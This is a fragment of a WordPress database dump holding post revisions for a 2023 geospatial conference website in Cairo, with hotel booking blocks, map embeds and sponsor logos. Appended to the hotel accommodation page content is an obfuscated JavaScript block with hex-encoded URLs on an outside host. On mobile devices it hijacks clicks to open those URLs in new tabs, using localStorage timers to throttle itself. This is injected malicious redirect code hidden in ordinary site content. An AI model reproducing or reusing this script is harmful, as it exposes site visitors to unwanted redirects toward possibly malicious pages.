primary_title_link=\"url:http%3A%2F%2F%3Cli%3E%3Ca%20href%3D%22https%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%22%20target%3D%22_blank%22%20%3Ehttps%3A%2F%2Fwww.kempinski.com%2Fen%2Fcairo%2Fnile-hotel%2F%3C%2Fa%3E%3C%2Fli%3E|title:Hotel%20Accommodation|target:_blank\"]</p>\n<ul>\n<li><a href=\"https://www.kempinski.com/en/cairo/nile-hotel/\" target=\"_blank\" rel=\"noopener\">https://www.kempinski.com/en/cairo/nile-hotel/</a></li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.9374842495713!2d31.228220615528013!3d30.03865132580035!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840cdb8f441cb%3A0x59cf96cf4cfe8978!2sKempinski%20Nile%20Hotel%20Garden%20City%20Cairo!5e0!3m2!1sen!2seg!4v1663341682148!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][vc_hoverbox image=\"2690\" primary_title=\"Novotel Cairo El Borg\" primary_title_font_container=\"color:%23eeee22\" primary_title_use_theme_fonts=\"yes\" hover_title=\"Novotel Cairo El Borg\" hover_title_use_theme_fonts=\"yes\" el_width=\"50\" hover_btn_title=\"BOOK NOW\" use_custom_fonts_primary_title=\"true\" use_custom_fonts_hover_title=\"true\" hover_add_button=\"true\" primary_title_link=\"url:https%3A%2F%2Fnovotelborg.com-cairo.com%2F|title:Hotel%20Accommodation|target:_blank\" hover_btn_link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fnovotel-cairo-el-borg%2F\"]</p>\n<ul>\n<li><a href=\"https://novotelborg.com-cairo.com/\" target=\"_blank\" rel=\"noopener\">https://novotelborg.com-cairo.com/</a></li>\n<li>\n<h4>Special Rate Booking is Opened Now</h4>\n<h5>Deadline for the Special Rates is August 15, 2023</h5>\n</li>\n</ul>\n<p><iframe style=\"border: 0;\" src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3453.7289982262637!2d31.224693715528264!3d30.044631725517785!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x145840d0447d5a79%3A0xbb55286e18afc4d8!2sNovotel%20Cairo%20El%20Borg!5e0!3m2!1sen!2seg!4v1663342678556!5m2!1sen!2seg\" width=\"400\" height=\"300\" allowfullscreen=\"allowfullscreen\"></iframe>[/vc_hoverbox][vc_separator color=\"sandy_brown\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Hotel Accommodation','','inherit','closed','closed','','2685-revision-v1','','','2023-06-24 00:10:05','2023-06-24 00:10:05','',2685,'https://gsw2023.com/?p=4769',0,'revision','',0),
(4770,1,'2023-06-24 00:14:20','2023-06-24 00:14:20','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219262706{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219711400{margin-top: 90px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687564731927{margin-top: 8px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn 